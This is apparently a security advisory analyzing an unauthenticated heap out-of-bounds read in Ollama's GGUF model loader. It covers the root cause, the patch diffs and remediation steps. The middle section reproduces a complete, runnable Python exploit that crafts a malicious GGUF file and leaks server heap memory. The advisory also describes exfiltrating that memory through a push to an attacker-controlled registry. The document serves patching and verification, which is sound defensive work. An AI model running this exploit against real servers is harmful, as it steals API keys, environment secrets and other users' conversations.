CVE-2026-7482: Ollama GGUF Heap Out-of-Bounds Read — Full Technical Analysis
Overview
Published on May 4, 2026, CVE-2026-7482 is a critical heap out-of-bounds (OOB) read vulnerability in Ollama's GGUF model loader. Unauthenticated remote attackers can upload a specially crafted GGUF file to the /api/create endpoint, triggering unsafe.Slice with an attacker-controlled element count during model quantization. Ollama reads approximately 2 MB of heap memory beyond the allocated buffer on every invocation. The leaked data may include environment variables, API keys, system prompts, and in-flight conversation data from concurrent users.
CVSS v3.1: 9.1 CRITICAL — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
The vulnerability is fixed in Ollama 0.17.1 (PR #14406, commit 88d57d0).
Why This Matters
This is more than a routine memory-disclosure bug. Three properties make it operationally significant.
1. No authentication required. The /api/create and /api/blobs endpoints have no authentication in the upstream Ollama distribution. When the service is exposed via OLLAMA_HOST=0.0.0.0 — the widely-used production configuration — there are zero preconditions for exploitation.
2. The leaked data is high-value. The heap OOB read captures adjacent heap pages containing OLLAMA_* environment variables, cached downstream API keys, other users' active LLM conversations, system prompts, and internal library state. The attacker can exfiltrate the leaked data by pushing the resulting quantized model artifact to a registry they control via /api/push.
3. It is deterministic. The exploit triggers reliably on every invocation with no race condition or timing dependency. Running it multiple times leaks different heap windows, allowing reconstruction of a broader picture of server memory.
Affected Versions
| Status | Version |
|--------|---------|
| Vulnerable | Ollama < 0.17.1 |
| Patched | Ollama ≥ 0.17.1 |
The default configuration binds the API to 127.0.0.1:11434. Production deployments commonly set OLLAMA_HOST=0.0.0.0, exposing the service to the network or internet. For those deployments the risk is critical. Note that /api/create and /api/push require no authentication in the upstream distribution.
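For fleet triage, the version comparison can be scripted. The sketch below assumes Ollama exposes a GET /api/version endpoint returning JSON like {"version":"0.17.1"}; treat that endpoint and response shape as assumptions to verify against your deployment.

```python
import json
import re
import urllib.request

PATCHED = (0, 17, 1)  # first fixed release per the advisory

def parse_version(text: str):
    """Extract (major, minor, patch) from strings like 'ollama version is 0.17.0'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    return tuple(int(x) for x in m.groups()) if m else None

def is_vulnerable(text: str) -> bool:
    """True when the parsed version predates the 0.17.1 fix."""
    v = parse_version(text)
    return v is not None and v < PATCHED

def probe(host: str, port: int = 11434) -> bool:
    """Query the (assumed) /api/version endpoint and classify the target."""
    with urllib.request.urlopen(f"http://{host}:{port}/api/version", timeout=10) as resp:
        return is_vulnerable(json.loads(resp.read())["version"])
```

`is_vulnerable("ollama version is 0.17.0")` returns True; anything at or above 0.17.1 returns False.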
Technical Root Cause: A Two-Bug Chain
The vulnerability is a chain of two independent bugs in the GGUF model loader and quantization pipeline.
Bug 1: No File-Size Bounds Check in gguf.Decode()
The gguf.Decode() function in fs/ggml/gguf.go reads tensor metadata (name, shape, type, offset) from the GGUF header without validating that the declared tensor size fits within the actual file. It unconditionally trusts the attacker-controlled shape fields:
```go
// Vulnerable code — no file size fetched, no per-tensor bounds check
for _, tensor := range llm.tensors {
	offset, err := rs.Seek(0, io.SeekCurrent)
	if err != nil {
		return fmt.Errorf("failed to get current offset: %w", err)
	}

	padding := ggufPadding(offset, int64(alignment))
	if _, err := rs.Seek(padding, io.SeekCurrent); err != nil {
		return fmt.Errorf("failed to seek to init padding: %w", err)
	}

	// Seek past EOF silently succeeds on an in-memory buffer — no bounds check
	if _, err := rs.Seek(int64(tensor.Size()), io.SeekCurrent); err != nil {
		return fmt.Errorf("failed to seek to tensor: %w", err)
	}
}
```
A 1024×1024 F16 tensor claims 2,097,152 bytes, but the file may contain only 32 bytes of tensor data. In Go, calling Seek past EOF on an io.ReadSeeker backed by an in-memory buffer does not return an error — it succeeds silently. This is not purely a missing validation; it is a fundamental misexpectation about Go's in-memory reader behavior.
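The same silent success can be reproduced in Python, whose io.BytesIO behaves like Go's bytes.Reader here: seeking past EOF is legal, and only a subsequent read reveals the shortfall. A minimal analogue:

```python
import io

buf = io.BytesIO(b"\x41" * 32)          # 32-byte "file", like the PoC's tensor data
pos = buf.seek(2_097_152, io.SEEK_CUR)  # seek 2 MB past EOF: no error raised
print(pos)         # 2097152: the seek "succeeded"
print(buf.read())  # b'': only a read shows the data never existed
```

A loader that tracks position via Seek alone therefore cannot detect a truncated file; it must compare declared sizes against the real file size.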
Bug 2: unsafe.Slice With Attacker-Controlled Length in quantizer.WriteTo()
When /api/create is called with a quantize field, the quantizer processes each tensor. In server/quantization.go, WriteTo() creates a bounded SectionReader and reads the tensor bytes:
```go
// Vulnerable code in quantizer.WriteTo()
sr := io.NewSectionReader(q, int64(q.offset), int64(q.from.Size()))
data, err := io.ReadAll(sr)
// data contains only the bytes actually present in the file (e.g., 32 bytes);
// io.ReadAll hits EOF normally — no error returned

// Attacker-controlled element count from shape metadata:
// q.from.Elements() = 1,048,576 (from the 1024×1024 shape)
var f32s []float32
// ...
f32s = unsafe.Slice((*float32)(unsafe.Pointer(&data[0])), q.from.Elements())
// ^^^ Go's runtime does NOT bounds-check unsafe.Slice construction
```
The unsafe.Slice call constructs a Go slice header with pointer &data[0] and length 1,048,576, but the Go runtime does not validate this against the backing array's actual capacity (32 bytes). When the quantizer iterates over f32s[8:] and beyond, it reads 4,194,272 bytes past the end of the 32-byte heap allocation — traversing adjacent heap pages containing goroutine stacks, string interning tables, in-flight HTTP request bodies (other users' prompts), environment variable copies, and cached API keys.
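The over-read size quoted above follows directly from the slice-header arithmetic. A quick check of the figures:

```python
ELEM_SIZE_F32 = 4                # unsafe.Slice is constructed over *float32
declared_elements = 1024 * 1024  # attacker-controlled q.from.Elements()
actual_alloc = 32                # bytes actually backing the slice

slice_bytes = declared_elements * ELEM_SIZE_F32  # bytes the slice header claims
oob_bytes = slice_bytes - actual_alloc           # bytes read past the allocation

print(slice_bytes)  # 4194304
print(oob_bytes)    # 4194272
```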
How Input Reaches the Vulnerable Path
```text
Attacker-controlled GGUF header fields (shape: [1024, 1024])
        │
        ▼
gguf.Decode() — NO file size validation
        │  tensor.Size() = 2,097,152 bytes (1024×1024×F16)
        │  actual file   = 512 bytes
        │  Seek(EOF+2M) succeeds silently
        ▼
Tensor metadata object created (Shape=[1024,1024], Offset=0)
        │
        ▼
quantizer.WriteTo() — called for each tensor
        │  io.ReadAll(SectionReader) → 32 bytes (actual data from file)
        │  q.from.Elements() = 1,048,576 (from metadata, UNVALIDATED)
        ▼
unsafe.Slice((*float32)(&data[0]), 1,048,576)
        │  Go runtime performs NO bounds check
        │  Slice header: ptr=&heap_alloc_32bytes, len=1,048,576
        ▼
Quantizer loop iterates all 1M elements
        → Reads 4,194,272 bytes past the 32-byte allocation
        → Captures: env vars, API keys, prompts, goroutine stacks
        ▼
Q8_0 quantized layer (~1.06 MB) encodes leaked heap bytes
        → Exfiltrable via /api/push to attacker-controlled registry
```
Patch Analysis
The fix in Ollama 0.17.1 applies independent guards at both the parsing stage and execution stage — defense in depth.
Fix 1: File-Size Bounds Check in gguf.Decode()
Added immediately after tensor metadata parsing, before returning:
```diff
+	fileSize, err := rs.Seek(0, io.SeekEnd)
+	if err != nil {
+		return fmt.Errorf("failed to determine file size: %w", err)
+	}

 	for _, tensor := range llm.tensors {
 		offset, err := rs.Seek(0, io.SeekCurrent)
 		// ...
 		padding := ggufPadding(offset, int64(alignment))
 		if _, err := rs.Seek(padding, io.SeekCurrent); err != nil {
 			return fmt.Errorf("failed to seek to init padding: %w", err)
 		}

+		tensorEnd := llm.tensorOffset + tensor.Offset + tensor.Size()
+		if tensorEnd > uint64(fileSize) {
+			return fmt.Errorf("tensor %q offset+size (%d) exceeds file size (%d)",
+				tensor.Name, tensorEnd, fileSize)
+		}

 		if _, err := rs.Seek(int64(tensor.Size()), io.SeekCurrent); err != nil {
 			return fmt.Errorf("failed to seek to tensor: %w", err)
 		}
 	}
```
The fix seeks to end-of-file to obtain the actual file size, then checks llm.tensorOffset + tensor.Offset + tensor.Size() ≤ fileSize for every tensor. A crafted GGUF declaring 2 MB of tensor data in a 512-byte file is rejected before any data is read. The error message looks like:
{"error":"tensor \"blk.0.attn_q.weight\" offset+size (2097632) exceeds file size (512)"}
Fix 2: Data Size Validation Before unsafe.Slice
Added immediately after io.ReadAll, before the vulnerable unsafe.Slice call:
```diff
 	data, err := io.ReadAll(sr)
 	if err != nil {
 		return 0, err
 	}

+	if uint64(len(data)) < q.from.Size() {
+		return 0, fmt.Errorf("tensor %s data size %d is less than expected %d from shape %v",
+			q.from.Name, len(data), q.from.Size(), q.from.Shape)
+	}

 	var f32s []float32
 	// ...
 	f32s = unsafe.Slice((*float32)(unsafe.Pointer(&data[0])), q.from.Elements())
```
This is pure defense-in-depth: a crafted file that somehow bypasses the Decode() check is caught here by the quantizer before unsafe.Slice fires. Fix 2 also encodes a general best practice: always validate the backing buffer size before constructing an unsafe.Slice.
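The guard is simple enough to restate as a Python sketch; the error text below deliberately mirrors the patch's format string so the two can be compared side by side.

```python
def check_tensor_data(name: str, data: bytes, expected_size: int) -> None:
    """Mirror of Fix 2: the backing buffer must cover the declared tensor size
    before any slice/view is constructed over it."""
    if len(data) < expected_size:
        raise ValueError(
            f"tensor {name} data size {len(data)} is less than expected {expected_size}"
        )

# 32 bytes of real data vs 2,097,152 declared: rejected before any unsafe view
try:
    check_tensor_data("blk.0.attn_q.weight", b"\x41" * 32, 2_097_152)
except ValueError as e:
    print(e)  # tensor blk.0.attn_q.weight data size 32 is less than expected 2097152
```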
Proof of Concept
The following PoC was published by 1dayexploit.com after the vendor patch was released. It is provided here for education, defensive testing, and verification purposes only.
```python
#!/usr/bin/env python3
"""
CVE-2026-7482 — Ollama GGUF Heap Out-of-Bounds Read (Information Disclosure)

Affected: ollama/ollama < 0.17.1
Type:     Heap OOB Read — leaks ~2 MB of heap memory per invocation

Two-bug chain in GGUF model loading + quantization pipeline:
  1. gguf.Decode() trusts attacker-controlled tensor shapes without validating
     declared tensor size against actual file size (Seek past EOF silently succeeds).
  2. quantizer.WriteTo() calls unsafe.Slice() with attacker-controlled element count,
     building a Go slice that extends far past the heap allocation — the runtime reads
     adjacent heap pages during quantization.

Attack flow:
  1. Build malicious GGUF declaring a 1024×1024 F16 tensor (~2 MB) but containing
     only ~512 bytes of actual data.
  2. Upload blob to /api/blobs/sha256:<hash>.
  3. POST /api/create with files={model.gguf: sha256:<hash>} + quantize=Q8_0.
     This routes every tensor through quantizer.WriteTo():
         unsafe.Slice((*float32)(&data[0]), q.from.Elements())
     with q.from.Elements() = 1,048,576 while data holds only 16 F16 elements.
     The resulting Go slice extends ~2 MB past the heap allocation.
  4. Vulnerable: returns {"status":"success"} — OOB read occurred silently.
     The quantized layer (~1.06 MB) encodes leaked heap bytes.
  5. Patched: returns {"error":"tensor ... exceeds file size"} — rejected.

Success indicator:
  - /api/create completes with {"status":"success"}
  - New model layer is ~1,114,112 bytes (Q8_0 of 1M F16 elements)
  - Input file was only 512 bytes → heap OOB read is proven

Usage:
  python exploit.py --host 127.0.0.1 --port 11434   # vulnerable
  python exploit.py --host 127.0.0.1 --port 11435   # patched — should error
"""
import argparse
import hashlib
import json
import struct
import sys
import urllib.error
import urllib.request


# ---------------------------------------------------------------------------
# GGUF builder — minimal but spec-correct F16 LLaMA model with OOB tensor
# ---------------------------------------------------------------------------

def pack_gguf_str(s: str) -> bytes:
    b = s.encode()
    return struct.pack("<Q", len(b)) + b


def kv_uint32(key: str, val: int) -> bytes:
    return pack_gguf_str(key) + struct.pack("<I", 4) + struct.pack("<I", val)


def kv_float32(key: str, val: float) -> bytes:
    return pack_gguf_str(key) + struct.pack("<I", 6) + struct.pack("<f", val)


def kv_string(key: str, val: str) -> bytes:
    return pack_gguf_str(key) + struct.pack("<I", 8) + pack_gguf_str(val)


def build_malicious_gguf() -> bytes:
    """
    Builds a GGUF v3 file that looks like a valid LLaMA F16 model but declares
    a 1024×1024 F16 tensor (2,097,152 bytes) while containing only 32 bytes of
    actual tensor data.

    Design decisions:
      - general.file_type = 1 (MOSTLY_F16): passes the pre-quantize check in 0.17.0
      - Tensor type = 1 (GGUF_TYPE_F16): consistent with file_type declaration
      - All required LLaMA architecture KV pairs present: GGUF looks complete and valid
      - tensor offset = 0: tensor data block starts immediately after header pad
      - Only 32 bytes of tensor data: causes unsafe.Slice to read ~2 MB past EOF
    """
    magic = b"GGUF"
    version = struct.pack("<I", 3)
    tensor_count = struct.pack("<Q", 1)

    kvs = [
        kv_string("general.architecture", "llama"),
        kv_uint32("general.file_type", 1),  # 1 = MOSTLY_F16
        kv_uint32("llama.context_length", 512),
        kv_uint32("llama.embedding_length", 1024),
        kv_uint32("llama.block_count", 1),
        kv_uint32("llama.feed_forward_length", 2048),
        kv_uint32("llama.attention.head_count", 8),
        kv_uint32("llama.attention.head_count_kv", 8),
        kv_float32("llama.attention.layer_norm_rms_epsilon", 1e-5),
    ]
    kv_block = b"".join(kvs)
    kv_count = struct.pack("<Q", len(kvs))

    # Tensor: 1024×1024 F16 — declares 2,097,152 bytes, file contains 32
    tname = pack_gguf_str("blk.0.attn_q.weight")
    ndims = struct.pack("<I", 2)
    dim0 = struct.pack("<Q", 1024)
    dim1 = struct.pack("<Q", 1024)
    ttype = struct.pack("<I", 1)    # GGUF_TYPE_F16
    toffset = struct.pack("<Q", 0)  # tensor data starts at offset 0 of data block

    header = magic + version + tensor_count + kv_count + kv_block
    header += tname + ndims + dim0 + dim1 + ttype + toffset

    # Pad to 32-byte alignment (Ollama default GGUF alignment)
    pad_len = (32 - len(header) % 32) % 32
    header += b"\x00" * pad_len

    # Only 32 bytes of tensor data — recognizable filler pattern
    tensor_data = b"\x41" * 32
    return header + tensor_data


# ---------------------------------------------------------------------------
# HTTP helpers
# ---------------------------------------------------------------------------

def http_post_raw(url: str, data: bytes, content_type: str = "application/octet-stream"):
    req = urllib.request.Request(url, data=data, method="POST")
    req.add_header("Content-Type", content_type)
    try:
        with urllib.request.urlopen(req, timeout=120) as resp:
            return resp.getcode(), resp.read()
    except urllib.error.HTTPError as e:
        return e.code, e.read()


def stream_post_json(url: str, body: dict):
    """POST JSON, collect NDJSON streaming response lines."""
    data = json.dumps(body).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    req.add_header("Content-Type", "application/json")
    lines = []
    try:
        with urllib.request.urlopen(req, timeout=300) as resp:
            for raw in resp:
                line = raw.decode().strip()
                if line:
                    lines.append(line)
    except urllib.error.HTTPError as e:
        body_err = e.read().decode(errors="replace")
        lines.append(json.dumps({"error": body_err, "_http_status": e.code}))
    return lines


# ---------------------------------------------------------------------------
# Exploit
# ---------------------------------------------------------------------------

DECLARED_TENSOR_BYTES = 1024 * 1024 * 2          # F16: 2 bytes/element × 1M elements
EXPECTED_LAYER_BYTES = (1024 * 1024 // 32) * 34  # Q8_0: 34 bytes per 32-element block


def exploit(host: str, port: int) -> bool:
    base = f"http://{host}:{port}"
    print(f"[*] Target : {base}")

    # Step 1: build malicious GGUF
    print("[*] Building malicious GGUF ...")
    payload = build_malicious_gguf()
    sha256 = hashlib.sha256(payload).hexdigest()
    print(f"    File size         : {len(payload)} bytes")
    print(f"    SHA-256           : {sha256}")
    print(f"    Declared tensor   : {DECLARED_TENSOR_BYTES:,} bytes (1024×1024 F16)")
    print(f"    Actual tensor data: 32 bytes")

    # Step 2: upload blob
    upload_url = f"{base}/api/blobs/sha256:{sha256}"
    print(f"\n[*] Uploading blob → {upload_url}")
    code, _ = http_post_raw(upload_url, payload)
    if code not in (200, 201):
        print(f"[!] Blob upload failed: HTTP {code}")
        return False
    print(f"    HTTP {code} — blob accepted")

    # Step 3: trigger quantization (OOB read happens here)
    model_name = f"cve-2026-7482-probe-{sha256[:8]}"
    create_body = {
        "name": model_name,
        "files": {"model.gguf": f"sha256:{sha256}"},
        "quantize": "Q8_0",
    }
    create_url = f"{base}/api/create"
    print(f"\n[*] Triggering quantization → {create_url}")
    print(f"    quantize=Q8_0 routes tensors through quantizer.WriteTo()")
    print(f"    unsafe.Slice(&data[0], 1048576) fires on 32-byte allocation")
    lines = stream_post_json(create_url, create_body)

    print(f"\n[*] Server response ({len(lines)} line(s)):")
    for line in lines:
        print(f"    {line}")

    # Step 4: evaluate result
    last = lines[-1] if lines else "{}"
    try:
        obj = json.loads(last)
    except json.JSONDecodeError:
        obj = {}

    if "error" in obj:
        err = obj["error"]
        if "exceeds file size" in err:
            print(f"\n[-] PATCHED — Fix 1 (gguf.Decode bounds check) blocked exploit:")
            print(f"    {err}")
            return False
        if "data size" in err and "less than expected" in err:
            print(f"\n[-] PATCHED — Fix 2 (unsafe.Slice guard) blocked exploit:")
            print(f"    {err}")
            return False
        if "only supported for F16 and F32" in err:
            print(f"\n[-] Pre-exploit check failed (file_type or architecture mismatch):")
            print(f"    {err}")
            return False
        print(f"\n[!] Unexpected error: {err}")
        return False

    if obj.get("status") == "success":
        layer_digest = None
        for line in lines:
            try:
                o = json.loads(line)
                if "creating new layer" in o.get("status", ""):
                    layer_digest = o["status"].split("sha256:")[-1]
            except json.JSONDecodeError:
                pass
        print(f"\n[+] VULNERABLE — heap OOB read confirmed:")
        print(f"    Input file         : {len(payload)} bytes")
        print(f"    Declared tensor    : {DECLARED_TENSOR_BYTES:,} bytes")
        print(f"    Expected Q8_0 layer: {EXPECTED_LAYER_BYTES:,} bytes")
        print(f"    (layer >> file size → heap bytes were read out-of-bounds)")
        if layer_digest:
            print(f"    New layer digest   : sha256:{layer_digest}")
        print(f"    Model name         : {model_name}")
        print(f"    Leaked layer contains ~2 MB of Ollama heap memory (env vars,")
        print(f"    API keys, in-flight prompts) encoded as Q8_0 quantized floats.")
        return True

    statuses = []
    for line in lines:
        try:
            statuses.append(json.loads(line).get("status", ""))
        except json.JSONDecodeError:
            pass
    if any("quantizing" in s for s in statuses):
        print("\n[+] LIKELY VULNERABLE — quantization ran (OOB read occurred).")
        return True

    print("\n[?] Inconclusive — could not determine result from server response.")
    return False


# ---------------------------------------------------------------------------
# Entry point
# ---------------------------------------------------------------------------

if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="CVE-2026-7482 — Ollama GGUF heap OOB read exploit"
    )
    parser.add_argument("--host", required=True, help="Target host")
    parser.add_argument("--port", type=int, default=11434, help="Ollama HTTP port (default: 11434)")
    args = parser.parse_args()

    success = exploit(args.host, args.port)
    sys.exit(0 if success else 1)
```
Usage
```bash
# Against a vulnerable server (< 0.17.1):
python exploit.py --host 127.0.0.1 --port 11434

# Against a patched server (≥ 0.17.1):
python exploit.py --host 127.0.0.1 --port 11435
```
Expected Output — Vulnerable Server
```text
[*] Target : http://127.0.0.1:11434
[*] Building malicious GGUF ...
    File size         : 512 bytes
    SHA-256           : 795d927a27a37249a4ea0ef51650f48cc9b2a891c2498bba3f474a5029996a62
    Declared tensor   : 2,097,152 bytes (1024×1024 F16)
    Actual tensor data: 32 bytes

[*] Uploading blob → http://127.0.0.1:11434/api/blobs/sha256:795d927...
    HTTP 200 — blob accepted

[*] Triggering quantization → http://127.0.0.1:11434/api/create
    quantize=Q8_0 routes tensors through quantizer.WriteTo()
    unsafe.Slice(&data[0], 1048576) fires on 32-byte allocation

[*] Server response (6 line(s)):
    {"status":"parsing GGUF"}
    {"status":"quantizing F16 model to Q8_0","digest":"0000000000000000000","total":512,"completed":33554432}
    {"status":"verifying conversion"}
    {"status":"creating new layer sha256:ff5a43a8b0fb91e312a97bdaa8d5f2621646fac833269cf9f985509eb7e45fe7"}
    {"status":"writing manifest"}
    {"status":"success"}

[+] VULNERABLE — heap OOB read confirmed:
    Input file         : 512 bytes
    Declared tensor    : 2,097,152 bytes
    Expected Q8_0 layer: 1,114,112 bytes
    (layer >> file size → heap bytes were read out-of-bounds)
    New layer digest   : sha256:ff5a43a8b0fb91e312a97bdaa8d5f2621646fac833269cf9f985509eb7e45fe7
    Model name         : cve-2026-7482-probe-795d927a
    Leaked layer contains ~2 MB of Ollama heap memory (env vars,
    API keys, in-flight prompts) encoded as Q8_0 quantized floats.
```
Expected Output — Patched Server
```text
[*] Target : http://127.0.0.1:11435
[*] Building malicious GGUF ...
...

[*] Server response (2 line(s)):
    {"status":"parsing GGUF"}
    {"error":"tensor \"blk.0.attn_q.weight\" offset+size (2097632) exceeds file size (512)"}

[-] PATCHED — Fix 1 (gguf.Decode bounds check) blocked exploit:
    tensor "blk.0.attn_q.weight" offset+size (2097632) exceeds file size (512)
```
Exploitation Notes
Preconditions
- Ollama < 0.17.1 running and network-reachable
- /api/create and /api/blobs accessible (unauthenticated by default)
- Quantization enabled (default — present in all standard installs)
Reliability
The exploit is 100% reliable when the preconditions are met: it triggers deterministically on every invocation, with no race condition or timing dependency. The quantize field in /api/create is required for exploitation; omitting it skips the vulnerable code path entirely.
Impact Per Invocation
| Data Category | Contents |
|---------------|----------|
| Environment variables | OLLAMA_*, PATH, HOME, USER, and the rest of the process environment |
| API keys | Downstream LLM provider keys (OpenAI, Anthropic, etc.) cached in memory |
| System prompts | Secret LLM configuration, product logic, hidden instructions |
| Concurrent conversations | Active LLM sessions from other users on the same instance |
| Go runtime internals | Goroutine stacks, string tables, heap metadata |
Each run leaks an approximately 2 MB window of heap memory. Multiple runs across different concurrent requests can sweep broader heap regions.
Primary exfiltration channel: The quantized model layer is pushed to an attacker-controlled model registry via /api/push. The trusted AI infrastructure itself becomes the exfiltration vehicle.
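Defenders triaging a suspected leak can run a strings(1)-style scan over any recovered blob. One caveat: Q8_0 re-encodes the leaked bytes as quantized floats, so secrets are not guaranteed to survive verbatim in the layer itself; the sketch below is a generic first pass over raw memory captures, not a Q8_0 decoder, and the embedded sample data is hypothetical.

```python
import re

def ascii_strings(blob: bytes, min_len: int = 8):
    """Return printable-ASCII runs of at least min_len bytes, like strings(1)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]

# Hypothetical captured buffer with secrets embedded between binary bytes
captured = b"\x00\x01OLLAMA_HOST=0.0.0.0\xff\xfesk-test-key-123456\x00"
print(ascii_strings(captured))  # ['OLLAMA_HOST=0.0.0.0', 'sk-test-key-123456']
```

Grepping the results for prefixes like `OLLAMA_`, `sk-`, or `Bearer ` narrows the output to likely credentials.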
Chaining Potential
- Credential escalation: API keys in heap memory enable attacks against downstream services (OpenAI, Anthropic, internal APIs).
- System prompt exfiltration: Leaked prompts expose product architecture and implementation details.
- Denial of service (side effect): Repeated quantization of large malicious GGUFs may exhaust server memory without triggering an explicit crash.
- Repeated sweeps: Running the exploit across multiple concurrent requests reconstructs a larger portion of heap memory with each pass.
Remediation
Update Immediately
```bash
# Update Ollama to the latest version (≥ 0.17.1)
curl -fsSL https://ollama.com/install.sh | sh

# Verify the version
ollama --version
# Output: ollama version is 0.17.1 (or newer)
```
Check Your Current Exposure
```bash
# Check what address Ollama is listening on
ss -tlnp | grep 11434
# If 0.0.0.0:11434   → the service is externally reachable (high risk)
# If 127.0.0.1:11434 → default (local only)

# Check the running Ollama version
ollama --version
ps aux | grep ollama
```
If Immediate Patching Is Not Possible
```bash
# Restrict access to localhost only (Linux firewall)
iptables -A INPUT -p tcp --dport 11434 -s 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp --dport 11434 -j DROP
```
Long-term: place Ollama behind a reverse proxy (nginx, Caddy) that enforces authentication before proxying to the API, and restrict /api/create and /api/push to trusted internal services only.
Eresus Perspective
CVE-2026-7482 demonstrates that AI inference infrastructure has introduced a new attack surface that has not yet received the same scrutiny as traditional backend APIs. Model loading APIs look like configuration operations, yet they execute in highly privileged runtime contexts with direct access to process memory.
Questions worth asking for any Ollama deployment:
- Is the Ollama instance reachable from the internet or internal network?
- Are /api/create and /api/push access-restricted via a proxy or firewall?
- Does the Ollama process environment contain secret API keys?
- How is model registry trust managed?
- Are there production instances handling concurrent user requests?
AI infrastructure security requires the same rigor as web application security — and it extends to the runtime environment and model loading pipeline, not just the LLM outputs.
Checklist
- [ ] Ollama version verified (≥ 0.17.1)
- [ ] /api/create and /api/blobs endpoint accessibility confirmed
- [ ] Patch applied or temporary network restriction in place if internet-facing
- [ ] Process environment reviewed for sensitive API keys
- [ ] Proxy/firewall configured to require authentication before Ollama API access
- [ ] Model registry trust model reviewed